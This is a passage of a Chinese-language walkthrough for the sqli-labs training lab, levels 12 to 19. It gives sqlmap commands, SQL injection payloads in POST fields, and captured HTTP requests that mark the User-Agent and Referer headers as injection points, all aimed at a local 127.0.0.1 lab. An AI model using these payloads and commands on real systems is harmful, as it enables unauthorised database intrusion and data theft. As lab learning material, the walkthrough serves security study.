或者使用语句:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-12/?id=1" --data "uname=")or("1")=("1&passwd=")or("1")=("1&submit=Submi" --dbs --threads 10 --batch --technique BES
第十三题:可以使用语句:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-13/?id=1" --data "uname=')or('1')=('1 &passwd=')or('1')=('1&submit=Submit" --dbs --threads 10 --batch --technique EBS
同样也是可以得到答案的(其他几个也是类似的手法)
简单的说一下关于十五题,毕竟这一题为布尔和时间延迟的盲注,简单的注入语句为:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-15/?id=1" --data "uname='or'1'='1&passwd='or'1'='1&submit=Submit" --dbs --threads 10 --batch --technique BET
下面就是属于sqli-labs 18-20,这三题主要时关于http的内容
常见的HTTP注入点产生位置为【Referer】、【X-Forwarded-For】、【Cookie】、【X-Real-IP】、【Accept-Language】、【Authorization】
Sqli-labs 18:属于报错型,单引号,user-agent型注入点
由于这一题时关于user-agent的注入直接使用语句:
python sqlmap.py -r 1.txt --dbs --threads 10 --batch --technique BTES
关于txt的内容:
POST /sqli-labs-master/Less-18/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0*
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer:
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Connection: close
Upgrade-Insecure-Requests: 1
uname=admin&passwd=admin&submit=Submit
就是属于burp里面的内容
-r: sqlmap可以从一个文本文件中获取HTTP请求,这样就可以跳过设置一些其他参数(比如cookie,POST数据,等等)
或者也可以这样:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-18/" --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0*" --level 4 --dbs --threads 10 --technique BEST –batch
--user-agent http头会携带一个值,就是user-agent,表示访问的浏览器的信息
sqlmap 检查uesr-agent中的注入点,
lever>=3才会去检查user-agent头是否存在注入漏洞
第十九题:报错型,单引号,referer型注入点
这一题的做法如同上一题一样都可以使用:
python sqlmap.py -r 1.txt --dbs --threads 10 --batch --technique BEST
只是存为1.txt的文档变成了这个:
POST /sqli-labs-master/Less-19/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: *
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Connection: close
Upgrade-Insecure-Requests: 1
uname=admin&passwd=admin&submit=Submit
另外也可以使用这样的语句跑出数据库:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-19/" --referer=" *" --level 4 --dbs --threads 10 --technique BEST –batch